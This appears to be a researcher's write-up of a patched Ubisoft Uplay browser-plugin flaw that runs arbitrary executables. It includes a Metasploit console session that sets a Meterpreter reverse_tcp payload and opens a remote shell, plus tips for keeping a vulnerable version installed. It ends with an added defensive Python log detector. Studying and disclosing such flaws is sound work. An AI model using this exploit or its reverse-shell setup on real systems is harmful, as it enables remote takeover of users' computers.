It's a very simple exploit: the plugin just takes the path to an exe and loads it for you, so there is no memory corruption to worry about. Our initial attempt would just run any local executable, and whilst we were developing this Ubisoft pushed out a very swift patch to prevent the flaw.
It's still possible to use the old installer for 2.03, disconnect from the internet to prevent the update process, log in, and set Uplay into offline mode to prevent further updates. This also means there might be a few souls out there still running vulnerable versions, but they will be few and far between.
It did not work in Windows 7 but happily did in Windows XP. Not sure why this is, but never mind. Tested it in IE; it should theoretically work in other browsers, but they generally did not have the plugin registered.
Further feedback from Rapid7's Sinn3r suggested using WebDAV to deliver the payload rather than limiting it to local files, so I butchered webdav_dll_hijacker.rb to serve exes. Had a few problems in that, when the exe was requested, Windows would then try to request xxx.exe.Manifest and DLLs alongside it, corrupting the executable, but with a helpful hint from HDM to answer those requests with a 404 it was off and running:
=[ metasploit v4.4.0-release [core:4.4 api:1.0]
+ -- --=[ 917 exploits - 495 auxiliary - 150 post
+ -- --=[ 250 payloads - 28 encoders - 8 nops

msf > use exploit/windows/browser/ubisoft_uplay_cmd_exec
msf exploit(ubisoft_uplay_cmd_exec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ubisoft_uplay_cmd_exec) > set LHOST 192.168.1.45
LHOST => 192.168.1.45
msf exploit(ubisoft_uplay_cmd_exec) > exploit
[*] Exploit running as background job.
msf exploit(ubisoft_uplay_cmd_exec) >
[*] Started reverse handler on 192.168.1.45:4444
[*] Exploit URI: http://192.168.1.45:80/kcomPoOs
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://192.168.1.45:80/
[*] Server started.
[*] 192.168.1.45 ubisoft_uplay_cmd_exec - GET => Exploit
[*] 192.168.1.45 ubisoft_uplay_cmd_exec - GET => Payload
[*] Sending stage (752128 bytes) to 192.168.1.45
[*] Meterpreter session 1 opened (192.168.1.45:4444 -> 192.168.1.45:3762) at 2012-07-31 20:45:15 +0100
Hopefully it will be included in the main trunk, but it's unlikely to get any real-world shells with it due to Ubisoft's swift turnaround! https://github.com/rapid7/metasploit-framework/pull/653
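As an added example (not from the original post or the Metasploit module), here is the defender's side of the WebDAV behaviour described above: when Windows runs an executable straight from a web share it also asks for <name>.exe.Manifest and for DLLs next to it, so a client that fetches an .exe and then probes for those has executed remotely hosted code, not merely downloaded it. The proxy log format and the sample lines are constructed assumptions.

```python
"""Flag clients whose proxy/web-server log shows an .exe fetched over HTTP/WebDAV
followed by the side-requests Windows makes when it runs that file in place
(<name>.exe.Manifest, then DLLs from the same directory)."""
import re
from collections import defaultdict

# Constructed sample log: client, request line, status (format is an assumption).
SAMPLE_LOG = """\
10.0.0.5 "GET /share/report.exe HTTP/1.1" 200
10.0.0.5 "GET /share/report.exe.Manifest HTTP/1.1" 404
10.0.0.5 "GET /share/msvcr100.dll HTTP/1.1" 404
10.0.0.7 "GET /downloads/setup.exe HTTP/1.1" 200
10.0.0.7 "GET /downloads/index.html HTTP/1.1" 200
"""

LINE_RE = re.compile(
    r'^(?P<client>\S+) "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})$')


def parse_log(text):
    """Yield one dict per well-formed log line; malformed lines are skipped."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield m.groupdict()


def find_remote_exe_launches(text):
    """Return {client: [exe_path, ...]} for clients that fetched an .exe and then
    requested its .Manifest or a DLL from the same directory. Status codes are
    ignored on purpose: the probes happen whether or not the server has the file,
    and a malicious share answers them with 404 to keep the exe loadable."""
    exe_seen = defaultdict(dict)   # client -> {exe_path: directory}
    hits = defaultdict(list)       # client -> [exe_path, ...]
    for rec in parse_log(text):
        client, path = rec["client"], rec["path"]
        low = path.lower()
        directory = path.rsplit("/", 1)[0]
        if low.endswith(".exe"):
            exe_seen[client][path] = directory
            continue
        for exe_path, exe_dir in exe_seen[client].items():
            manifest_probe = low == exe_path.lower() + ".manifest"
            dll_probe = low.endswith(".dll") and directory == exe_dir
            if (manifest_probe or dll_probe) and exe_path not in hits[client]:
                hits[client].append(exe_path)
    return dict(hits)


if __name__ == "__main__":
    for client, exes in find_remote_exe_launches(SAMPLE_LOG).items():
        print(f"{client}: executed remotely hosted {', '.join(exes)}")
```

Only 10.0.0.5 is flagged: 10.0.0.7 downloaded setup.exe but never asked for its manifest or neighbouring DLLs.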